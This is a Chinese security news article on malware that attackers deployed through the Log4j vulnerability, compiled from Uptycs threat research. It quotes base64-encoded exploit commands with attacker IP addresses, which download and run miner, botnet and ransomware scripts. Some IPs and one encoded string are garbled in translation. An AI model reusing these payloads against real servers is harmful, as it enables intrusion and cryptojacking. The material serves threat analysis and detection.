盘点:Log4j 漏洞带来的深远影响

盘点:Log4j 漏洞带来的深远影响


上周,Log4j 漏洞颠覆了互联网,影响是巨大。攻击者也已经开始利用该漏,到目前为止,Uptycs 研究人员已经观察到与 coinminers、DDOS 恶意软件和一些勒索软件变种相关的攻击,这些攻击积极利用了此漏洞。

未来几天勒索软件攻击的规模可能会增加。由于该漏洞非常严重,因此可能还会发现一些可以绕过当前补丁级别或修复程序的变体。因针对这种攻击持续监控和强化系统是极其重要的。

Uptycs 此前在博客中为其客户分享了有关补救和检测步骤的详细信息 。并讨论了攻击者利用 Log4j 漏洞的各种恶意软件类别。Uptycs 威胁研究团队确定了投放在易受攻击的服务器上的不同类型的有效载荷。有效载荷包括著名的恶意软件,如 Kinsing 和 Xmrig coinminers,以及 Dofloo、Tsunami 和 Mirai 僵尸网络恶意软件。除了这些恶意软件系列,攻击者已经开始在在易受CVE-2021-44228服务器上部署勒索软件。

01

Xmrig

Xmrig 是一个开源的 Monero CPU Miner,用于挖掘 Monero 加密货币。攻击者利用 Log4j2 漏洞后,攻击者试图运行恶意 shell 脚本,其中包含下载 xmrig 矿工的命令。

命令是 93.189.42 8 []:5557,/基本/命令/ Base64/编码 KGN1cmwgLXMgOTMuMTg5LjQyLjgvbGguc2h8fHdnZXQgLXEgLU8tIDkzLjE4OS40Mi44L2xoLnNoKXxiYXNo。

此命令下载矿工shell 脚本/46bd3a99981688996224579db32c46af17f8d29a6c90401fb2f13e918469aff6

shell 脚本(见图 1)首先杀死已经在运行的矿工二进制文件,然后从互联网下载 xmrig 矿工二进制文件并运行它。

盘点:Log4j 漏洞带来的深远影响

图 1:Shell 脚本下载并执行 Xmrig


02

Kinsing

Kinsing 是一种自我传播的加密挖掘恶意软件,以前针对配置错误的开放 Docker Daemon API 端口。Kinsing 恶意软件是用 golang 编写的,通常是通过恶意 shell 脚本删除的。kinsing shell 脚本包括几种防御规避技术,如 setfacl 使用、chattr 使用、日志删除命令等。

大规模扫描后的攻击者试图在易受攻击的服务器上放置 kinsing 二进制文件。攻击者用来删除和运行 shell 脚本的:92.242.40[.]21:5557,/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoLnNofHx3Z2V0IC1xIC1PLSA5NDAGugc2gEg2gEg2gEg2.

在shell脚本:7e9663f87255ae2ff78eb882efe8736431368f341849fec000543f027bdb4512)中,我们可以看到攻击者在 shell 脚本运行时放置了删除 kinsing 恶意软件二进制文件的命令(见图 2)。

盘点:Log4j 漏洞带来的深远影响

图 2:通过 shell 脚本下载 Kinsing


kinsing shell 脚本还包含与 docker 相关的命令,这些命令会杀死受害系统上已经运行的矿工进程(如果存在)。

盘点:Log4j 漏洞带来的深远影响

图 3:用于杀死已经运行的矿工的 docker 命令


03

DDoS 僵尸网络负载

在一些漏洞利用尝试中,攻击者试图删除分布式拒绝服务 (DDoS) 恶意软件二进制文件,如 dofloo、Mirai。


04

Dofloo

Dofloo (又名 AeSDdos,flooder)是一种DDoS类型的恶意软件,可对目标 IP 地址进行各种泛洪攻击,如 ICMP 和 TCP。除了泛洪攻击外,Dofloo 通过操纵受害者系统中的 rc.local 文件来确保其持久性。它的一些变体在受害计算机上部署了加密货币矿工。

在情报系统中,攻击者也在利用易受攻击的服务器后投放 Dofloo 恶意软件。由攻击者使用完整的命令是 81.30.157 43 []:1389,/基本/命令/ Base64编码/ d2dldCBodHRwOi8vMTU1Ljk0LjE1NC4xNzAvYWFhO2N1cmwgLU8gaHR0cDovLzE1NS45NC4xNTQuMTcwL2FhYTtjaG1vZCA3NzcgYWFhOy4vYWFh。下图(参见图 4)显示了 Dofloo 对 rc.local 的操作:6e8f2da2a4facc2011522dbcdaca509195bfbdb84dbdc840382b9c40d7975548)在 Log4j 后利用中使用的变体。

盘点:Log4j 漏洞带来的深远影响

图 4:Dofloo 操作 rc.local


05

mushtik

海啸(又名mushtik)是基于DDoSflooder一个跨平台的恶意软件,在下载文件过程中被感染系统中执行shell的命令。海啸样本:4c97321bcd291d2ca82c68b02cde465371083dace28502b7eb3a88558d7e190c)使用 crontab 作为持久性。除了持久性,它还删除一个副本 /dev/shm/ 目录作为防御规避策略(参见图 5)。

盘点:Log4j 漏洞带来的深远影响

图 5:Tsunami 通过 cron 从 /dev/shm 运行


06

Mirai

Mirai是一种恶意软件,它感染在 ARC 处理器上运行的智能设备,将它们变成一个远程控制的机器人网络。Mirai 还通过恶意 shell 脚本传送。攻击者使用的命令是 45.137.21[.]9:1389,/Basic/Command/Base64/d2dldCAtcSAtTy0gaHR0cDovLzYyLjIxMC4xMzAuMjUwL2xoLnNofGJhc2g=。该命令使用 wget 实用程序从攻击者 C2,62.210.130[.]250 中删除 Mirai 恶意软件(见图 6)。

盘点:Log4j 漏洞带来的深远影响

图 6:从 C2 下载 mirai 的 Shell 脚本


07

Linux

攻击者还利用 Log4j 漏洞在易受攻击的服务器上投放 Linux 勒索软件。攻击者在利用 Log4j 漏洞后试图删除Linux 勒索软件:5c8710638fad8eeac382b0323461892a3e1a8865da3625403769a4378622077e。勒索软件是用 golang 编写的,并操纵 ssh 文件在受害者系统中传播自身。攻击者丢弃的赎金票据如下所示(见图 7)。

盘点:Log4j 漏洞带来的深远影响

图 7:Linux 赎金说明


08

Uptycs EDR

Uptycs EDR 使用映射到 MITRE ATT&CK 和 YARA 进程扫描的行为规则成功检测到所有有效负载。下面显示了我们的行为规则主动检测到的 Linux 勒索软件的示例(参见图 8)。

盘点:Log4j 漏洞带来的深远影响

图 8:使用 Uptycs EDR 检测勒索软件


09

Xmrig

除了行为规则之外,当 YARA 检测被触发时,Uptycs EDR 通过威胁研究团队策划的 YARA 规则分配威胁配置文件。用户可以导航到检测警报中的工具包数据部分,然后单击名称以查找工具包的说明。Uptycs EDR 检测到的 Xmrig 恶意软件活动的摘录如下所示(见图 9)。

盘点:Log4j 漏洞带来的深远影响

图 9:使用 Uptycs EDR 进行 XMrig 检测


  • 卷土重来的log4j漏洞攻击

  • 英国推出新政策,计划在2022年成为“全球网络强国”

  • Meta公司中断了七家雇佣监控公司的运营

  • 蜘蛛侠粉丝警告!黑客正利用新电影进行诈骗活动

  • 尝试与黑客合作,美国国土安全部推出“Hack DHS”计划

  • 美国CISA命令联邦机构在12月24日之前修复Log4Shell

  • 数十亿WIFI芯片存在数据泄露和流量操控

  • 南澳大利亚8万政府员工信息遭泄漏

  • 新鲜出炉:安全威胁月报-11月

盘点:Log4j 漏洞带来的深远影响

注:本文由E安全编译报道。

盘点:Log4j 漏洞带来的深远影响

上一篇:2021,当VR实干遇到元宇宙虚火
下一篇:【AI原创】汽车传动系耐久试验系统控制技术研究

相关推荐

调查:黑客正在接近工作人员以进行勒索软件攻击

调查:黑客正在接近工作人员以进行勒索软件攻击

1007 企业网D1net

点击上方“蓝色字体”,选择“设为星标”关键讯息,D1时间送达!根据Pulse和HitachiID的一份报告,有越来越多的公司内部员工表示曾经被要求协助进行勒索软件攻击,本文介绍了企业如何应对这种情况。Pulse和HitachiID的一份报告显示,网络攻击者已经接触了北美48%的企业的员工,以让企业的员工协助进行勒索软件攻击。在这项研究中,有100名IT和安全

赛迪研究院院长张立:加快软件名城提质升级 大力推动软件产业集聚发展

赛迪研究院院长张立:加快软件名城提质升级 大力推动软件产业集聚发展

1927 中国电子报

编者按:11月30日,工业和信息化部连续发布了《“十四五”信息化和工业化深度融合发展规划》《“十四五”软件和信息技术服务业发展规划》《“十四五”大数据产业发展规划》,中国电子报约请相关行业专家就三个产业发展规划进行深度解读,敬请期待。本期为中国电子信息产业发展研究院院长张立对《“十四五”软件和信息技术服务业发展规划》的解读。中国电子信息产业发展研究院院长张立

遭遇勒索软件攻击之后需要采取的5个恢复步骤

遭遇勒索软件攻击之后需要采取的5个恢复步骤

11 企业网D1net

点击上方“蓝色字体”,选择“设为星标”关键讯息,D1时间送达!企业需要按照必要的勒索软件恢复步骤为勒索软件攻击事件的“之前”和“期间”做好准备。本文将讨论企业如何恢复数据、减少声誉损失和降低安全风险,以及如何最大限度地降低总体成本。对于任何一个勒索软件攻击事件或安全事件,都会有之前、期间和之后这三个阶段。人们需要了解如何在每个阶段保护其所在的企业,并了解勒索

10月19日下午,国家发展改革委财金司主要负责同志带队赴郑州商品交易所调研,并召开专题座谈会,研究今年以来动力煤期货价格走势和依法加强监管、严厉查处资本恶意炒作动力煤期货有关情况。会议指出,当前相关部

10月19日下午,国家发展改革委财金司主要负责同志带队赴郑州商品交易所调研,并召开专题座谈会,研究今年以来动力煤期货价格走势和依法加强监管、严厉查处资本恶意炒作动力煤期货有关情况。会议指出,当前相关部

1346 新疆949交通广播

来源:综合国家发改委网站、郑州商品交易所官网、经济日报、中国证券报、中国经济网针对近期煤炭价格快速上涨,连创历史新高,为做好煤炭市场保供稳价工作,国家发展改革委祭出政策组合拳。研究依法对煤炭价格实行干预措施近期煤炭价格快速上涨,连创历史新高,大幅推高下游行业生产成本,对电力供应和冬季供暖产生不利影响,社会各方面反映强烈。10月19日下午,国家发展改革委组织重

市场被国外软件企业分割,短期难撼动

市场被国外软件企业分割,短期难撼动

102 中国电子报

工业软件发展水平是一个国家工业能力的缩影,而研发设计类软件又被认为是工业制造的核心、源头与基础。中国是全球工业体系最全的国家,但在核心的工业设计软件领域却迟迟难以突破。不过,《中国电子报》记者在采访时了解到,有些专家认为,云计算、5G、AI给工业软件带来了很多新的机遇,我国工业软件企业有望迎来快速赶超的机会。市场被国外软件企业分割,短期难撼动工业设计软件自身

国产3D打印数据准备软件Voxeldance Tango,获普利生青睐

国产3D打印数据准备软件Voxeldance Tango,获普利生青睐

1826 南极熊3D打印

上海普利生机电科技有限公司,简称普利生Prismlab。成立于2005年,是一家专业从事3D打印相关技术研发的高新技术企业,旗下拥有多款应用于多个领域的3D打印设备,以及多款联合德国化工业巨头、德国巴斯夫(BASF)共同研发的定制树脂材料,公司整合研发、销售和服务,产品行销世界50多个国家和地区。目前,普利生正专注于齿科数字化技术的市场应用,通过搭建齿科数字

绝境中,他下了最后一个命令:笑!

绝境中,他下了最后一个命令:笑!

516 新华社

71年前一支130多人的部队高擎进藏大旗从新疆南部出发了他们为和平而来没有进行战斗却以接近半数的牺牲被毛泽东称赞为“盖世英雄”从出发到完成使命三百多个日夜他们在严酷的高原上遭遇了什么是谁宁可住羊圈也决不违反纪律是谁留下“力断强弓,智定昆仑”的传奇是谁在绝境中给战士们下了“笑”的命令请与本期《国家相册》一起回望一段永载史册的征程向将和平与光明带进雪域高原的英雄

如何让几何难题动起来?这个软件数学老师必备!假期提升自己!

如何让几何难题动起来?这个软件数学老师必备!假期提升自己!

1874 数学好教师

几何是数学中的一大板块,学习几何也需要将抽象的定理理解,很多成绩差的学生记不住,学不会,不会用,严重影响几何知识的掌握。数学课讲到几何有关的内容时,“点动成线,线动成面,面动成体”这几句话,大概是每位数学老师都能脱口而出的“口诀”。不过“口诀”好说,想给学生演示,却不得不费一番功夫。角的变化、点在坐标系内的移动、两个三角形绕顶点旋转时的分类讨论……数学的奥妙

私房话

“他最近抑郁了?原来只是出轨了。”|恋爱里的小丑竟是我自己。

324 曲玮玮

我发现了一个规律,女生总是喜欢在爱情里自我感动。为什么很多女孩明明被渣却不自知,还沉浸于自己编造的甜蜜爱情里?就是因为她们的脑补能力太强,有着莫名其妙的同情心,和异常强大的同理心。男朋友犯了某个错误,正在想道歉理由时,女生已非常懂事的为他找好了借口。然后自我感动到:“唉,我真是太善解人意了,他一定会更爱我的吧?”女生啊,有时候一个人就可以完成一场恋爱,她们就

私房话

真的,谈恋爱哪有杀老公好看

1019 八卦电影

大雨,深夜,一个男人跌跌撞撞走在街头。他不断摔倒在地上,身上带着血,满身都是泥污。他喃喃自语,见人就说——帮帮我,帮我杀了我妻子吧!不管你要多少钱,我都愿意!旁边的人觉得这就是个疯子,都不予以理会。看到没人理会,这个男人疯狂地大声喊,“救救我!怎么才能杀了我妻子.....”什么样的深仇大恨,让他做出这么变态的选择?《出轨的话就死定了》2020年开头出现的这个

私房话

我的2020年终总结,全在这些表情包里了

1511 每日豆瓣

我的工作我的思绪我的想法收到工资前的我收到工资后的我从前面对傻缺甲方的我现在面对傻缺甲方的我我的副业我的生活我的学习我的考试我的年度计划完成情况我的周末我的运动我的身材我的脸皮我的头发我的运气我的性格我的友情我的爱情我的技能我的心态我的假期从前和别人吵架的我现在和别人吵架的我我的饭量网购前的我网购后的我从前爸妈叫我相亲现在爸妈叫我相亲我向往的生活我真实的生活

私房话

不管夫妻还是情人,关系再好,也不要伸手要这三样东西!

1811 商界管理圈子

阅读本文前,请您先点击本文标题下面的蓝色字体“商界管理圈子”再点击“关注”,这样你就可以继续免费收到文章了,每天早上7:00准时分享,请放心关注.............................................在感情的世界里,伸手要和主动给,完全是两回事。如果一个人真的爱你,无需你开口,对方就会主动给你。倘若你开口提了,伸手要了,意义

私房话

人到中年,遇上灵魂伴侣,是劫不是缘

1451 阅世悦人

来源|精彩女人(ID:jcnv365)文|十七朵呀草在结他的种子,风在摇他的叶子,我们站着,不说话,就很美好。我们来这世上走一遭,如果能遇到一个心意相通,相知相爱的伴侣相守一生,是一件非常幸福的事。关于灵魂伴侣,每个人在单身的时候都曾有过美好的幻想。然而,有太多人误解了灵魂伴侣的真正含义。多少人得陇望蜀,缘木求鱼,到最后也没有好好珍惜已经得到的,却一辈子都对

私房话

“不结婚就死给你看!”30岁女子遭母亲逼婚,生完孩子后她母亲后悔了……丨天亮说早安

1733 湖北经视

朱军今年37岁,妻子刘艳30岁两人在今年年初奉子成婚刘艳怀胎十月剖腹产生下了女儿女儿现在已经三个多月了然而两人从相识到现在一年多的时间真正在一起生活的日子不过两个多月更不正常的是有了婚礼,有了孩子妻子却不愿领证不愿回两人的家妻子刘艳说举行婚礼前恰逢他的生日正好可以领取结婚证成为结婚纪念日可是朱军却提出日子要有父母决定拒绝了刘艳的提议之后又因诸多巧合一直拖到了

私房话

爸,你早就不爱我妈了吧?

1785 青年文摘

点击上方蓝字“青年文摘”右上角“...”点选“设为星标”添加★标不再错过推送每天8点12点20点不见不散~作者:关山月来源:凯叔讲故事ID:kaishujianggushi我一直相信一句话:教育永远是从生活中习得的。最好的教育,是父母相爱;最好的家庭,是不断成长。爸,你早就不爱我妈了吧?如果孩子问你,你怎么回答?当然爱啊,要不然怎么会有你。小孩子懂什么,一边

私房话

够了,别再劝我“降低标准”了。

287 一个人Alone

很多事情凑合一下就行了你都三十岁了要求别那么高学会降低标准才是聪明人的做法......可是降低标准不就等于否定过去的自己吗?够了别再劝我降低标准了我发现,新世纪的“离谱”就是,亲戚给你介绍的对象,别说你不喜欢了,你甚至会产生世纪迷思——“在他们眼里,我真的就只配这样了吗?”比如说,我月薪好几万的朋友,被介绍了一个工作稳定薪资稳定的月入三千的男人,还被说你是打

私房话

晚安 | 感情的最高境界就是守候彼此的孤独

1263 深夜谈吃

晚安|第一千七百六十八夜来自佚名▲长按图片,保存你的晚安音乐选歌:Sake推荐理由:听听歌,早点睡。睡前谈心「感情的最高境界就是守候彼此的孤独」▼这一年就快要过去了这两天在规划着跨年的事情时想起有一年我去迷笛的音乐节一边对深夜的稿子一边摇头晃脑一晃眼时代变得面目全非,我也成长了好多能跟我分享一下你们2020年的感受么最深刻的感悟或者最难忘的记忆都可以说多长都